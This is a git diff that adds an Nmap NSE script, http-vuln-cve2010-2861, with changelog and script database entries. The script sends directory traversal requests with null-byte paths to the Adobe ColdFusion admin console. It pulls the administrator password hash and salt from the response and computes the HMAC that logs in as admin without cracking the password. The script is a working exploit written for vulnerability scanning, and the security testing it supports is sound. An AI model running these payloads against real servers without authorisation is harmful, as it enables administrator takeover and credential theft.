diff --git a/CHANGELOG b/CHANGELOG index 8e191c4ac..0995c2a78 100644 --- a/CHANGELOG +++ b/CHANGELOG @@ -1,5 +1,8 @@ # Nmap Changelog ($Id$); -*-text-*- +o [NSE] Added the script http-vuln-cve2010-2861 to detect the Cold Fusion + CVE-2010-2861 directory traversal vulnerability. [Micah Hoffman] + o [NSE] Added support for edns-client-subnet requests to the DNS library and the script dns-client-subnet-scan that scans for addresses resolved from different subnets. [John Bond] diff --git a/scripts/http-vuln-cve2010-2861.nse b/scripts/http-vuln-cve2010-2861.nse new file mode 100644 index 000000000..c1d43a1d9 --- /dev/null +++ b/scripts/http-vuln-cve2010-2861.nse @@ -0,0 +1,135 @@ +description = [[ +This script will execute a directory traversal attack against a ColdFusion +server and try to grab the password hash for the administrator user. It +will then use the salt value (hidden in the web page) to create the SHA1 +HMAC hash that the web server needs for authentication as admin. You can +pass this value to the ColdFusion server as the admin without cracking +the password hash. +]] + +--- +-- @usage +-- nmap --script http-vuln-cve2010-2861 +-- +-- @output +-- 80/tcp open http +-- | http-vuln-cve2010-2861: +-- | VULNERABLE: +-- | Adobe ColdFusion enter.cfm Traversal password.properties Information Disclosure +-- | State: VULNERABLE +-- | IDs: CVE:CVE-2010-2861 OSVDB:67047 +-- | Description: +-- | Multiple directory traversal vulnerabilities in the administrator console in Adobe ColdFusion +-- | 9.0.1 and earlier allow remote attackers to read arbitrary files via the locale parameter +-- | Disclosure date: 2010-08-10 +-- | Extra information: +-- | +-- | ColdFusion8 +-- | HMAC: d6914bef568f8931d0c696cd5f7748596f97db5d +-- | Salt: 1329446896585 +-- | Hash: 5BAA61E4C9B93F3F0682250B6CF8331B7EE68FD8 +-- | +-- | References: +-- | http://www.blackhatacademy.org/security101/Cold_Fusion_Hacking +-- | http://www.nessus.org/plugins/index.php?view=single&id=48340 +-- | http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2861 +-- | http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-2861 +-- |_ http://osvdb.org/67047 +-- +-- +-- This script relies on the service being identified as HTTP or HTTPS. If the +-- ColdFusion server you run this against is on a port other than 80/tcp or 443/tcp +-- then use "nmap -sV" so that nmap discovers the port as an HTTP server. + +author = "Micah Hoffman" +license = "Same as Nmap--See http://nmap.org/book/man-legal.html" +categories = {"intrusive", "vuln"} + +require("http") +require("shortport") +require("tab") +require("vulns") +require("openssl") + +portrule = shortport.http + +action = function(host, port) + + local vuln = { + title = 'Adobe ColdFusion Directory Traversal Vulnerability', + state = vulns.STATE.NOT_VULN, -- default + IDS = {CVE = 'CVE-2010-2861', OSVDB = '67047'}, + description = [[ +Multiple directory traversal vulnerabilities in the administrator console +in Adobe ColdFusion 9.0.1 and earlier allow remote attackers to read arbitrary files via the +locale parameter]], + references = { + 'http://www.blackhatacademy.org/security101/Cold_Fusion_Hacking', + 'http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-2861', + 'http://osvdb.org/67047', + 'http://www.nessus.org/plugins/index.php?view=single&id=48340', + }, + dates = { + disclosure = {year = '2010', month = '08', day = '10'}, + }, + } + local vuln_report = vulns.Report:new(SCRIPT_NAME, host, port) + + -- Function to do the look up and return content + local grabAndGrep = function(page) + -- Do the HTTP GET request for the page + local response = http.get(host, port, page) + -- Check to see if we get a good page returned + -- Is there no response? + if ( not(response.status) ) then + return false, "Received no response from HTTP server" + end + + -- Is the response not an HTTP 200 code? + if ( response.status ~= 200 ) then + return false, ("The server returned an unexpected response (%d)"):format(response.status ) + end + + -- Now check the body for our strings + if ( response.body ) then + local saltcontent = response.body:match("salt.*value=\"(%d+)") + local hashcontent = response.body:match("password=(%x%x%x%x+)") --Extra %x's needed or it will match strings that are not the long hex password + + -- If a page has both the salt and the password in it then the exploit has been successful + if ( saltcontent and hashcontent ) then + vuln.state = vulns.STATE.EXPLOIT + -- Generate HMAC as this is what the web application needs for authentication as admin + local hmaccontent = stdnse.tohex(openssl.hmac('sha1', saltcontent, hashcontent)):upper() + --return true, ("\n\tHMAC: %s\n\tSalt: %s\n\tHash: %s"):format(hmaccontent, saltcontent, hashcontent) + local result = { + ("HMAC: %s"):format(hmaccontent), + ("Salt: %s"):format(saltcontent), + ("Hash: %s"):format(hashcontent) + } + return true, result + end + end + return false, "Not vulnerable" + end + + local exploits = { + ['CFusionMX'] = '..\\..\\..\\..\\..\\..\\..\\..\\CFusionMX\\lib\\password.properties\%00en', + ['CFusionMX7'] = '..\\..\\..\\..\\..\\..\\..\\..\\CFusionMX7\\lib\\password.properties\%00en', + ['ColdFusion8'] = '..\\..\\..\\..\\..\\..\\..\\..\\ColdFusion8\\lib\\password.properties\%00en', + ['JRun4\\servers'] = '..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\JRun4\\servers\\cfusion\\cfusion-ear\\cfusion-war\\WEB-INF\\cfusion\\lib\\password.properties\%00en', + } + + local results = {} + for prod, exploit in pairs(exploits) do + local status, result = grabAndGrep('/CFIDE/administrator/enter.cfm?locale=' .. exploit) + if ( status or ( not(status) and nmap.verbosity() > 1 ) ) then + if ( "string" == type(result) ) then + result = { result } + end + result.name = prod + table.insert(results, result ) + end + end + vuln.extra_info=stdnse.format_output(true, results) + return vuln_report:make_output(vuln) +end \ No newline at end of file diff --git a/scripts/script.db b/scripts/script.db index 1077388d3..f80b20134 100644 --- a/scripts/script.db +++ b/scripts/script.db @@ -142,6 +142,7 @@ Entry { filename = "http-userdir-enum.nse", categories = { "auth", "intrusive", Entry { filename = "http-vhosts.nse", categories = { "discovery", "intrusive", } } Entry { filename = "http-vmware-path-vuln.nse", categories = { "safe", "vuln", } } Entry { filename = "http-vuln-cve2009-3960.nse", categories = { "exploit", "intrusive", } } +Entry { filename = "http-vuln-cve2010-2861.nse", categories = { "intrusive", "vuln", } } Entry { filename = "http-vuln-cve2011-3192.nse", categories = { "safe", "vuln", } } Entry { filename = "http-vuln-cve2011-3368.nse", categories = { "intrusive", "vuln", } } Entry { filename = "http-waf-detect.nse", categories = { "discovery", "intrusive", } }